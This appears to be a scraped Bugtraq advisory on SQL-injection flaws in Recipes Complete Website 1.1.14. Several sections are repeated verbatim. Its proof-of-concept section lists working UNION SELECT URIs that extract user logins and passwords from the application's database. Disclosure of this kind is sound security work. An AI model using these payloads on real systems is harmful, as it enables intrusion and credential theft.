Recipes Complete Website SQL Injection Vulnerabilities
BID:21270
Info
Recipes Complete Website SQL Injection Vulnerabilities
| Bugtraq ID: | 21270 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 23 2006 12:00AM |
| Updated: | Nov 27 2006 09:30PM |
| Credit: | GregStar is credited with discovering these issues. |
| Vulnerable: |
Recipes Complete Website Recipes Complete Website 1.1.14 |
| Not Vulnerable: | |
Discussion
Recipes Complete Website SQL Injection Vulnerabilities
Recipes Complete Website is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
Version 1.1.14 is confirmed affected.
Recipes Complete Website is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
Version 1.1.14 is confirmed affected.
Exploit / POC
Recipes Complete Website SQL Injection Vulnerabilities
An attacker can exploit these issues via a web client.
The following URIs demonstrate these issues:
http://www.example.com/[path]/recipe.php?recipeid=-1%20UNION%20SELECT%20login,password,0,0,0,0%20FROM%20users%20/*
http://www.example.com/[path]/list.php?pagenum=0&categoryid=-1%20UNION%20SELECT%200,login,0,0%20FROM%20users%20/* - login
http://www.example.com/[path]/list.php?pagenum=0&categoryid=-1%20UNION%20SELECT%200,password,0,0%20FROM%20users%20/* - password
An attacker can exploit these issues via a web client.
The following URIs demonstrate these issues:
http://www.example.com/[path]/recipe.php?recipeid=-1%20UNION%20SELECT%20login,password,0,0,0,0%20FROM%20users%20/*
http://www.example.com/[path]/list.php?pagenum=0&categoryid=-1%20UNION%20SELECT%200,login,0,0%20FROM%20users%20/* - login
http://www.example.com/[path]/list.php?pagenum=0&categoryid=-1%20UNION%20SELECT%200,password,0,0%20FROM%20users%20/* - password
Solution / Fix
Recipes Complete Website SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
References
Recipes Complete Website SQL Injection Vulnerabilities
References:
References:
- Vendor Homepage (EasySiteNetwork)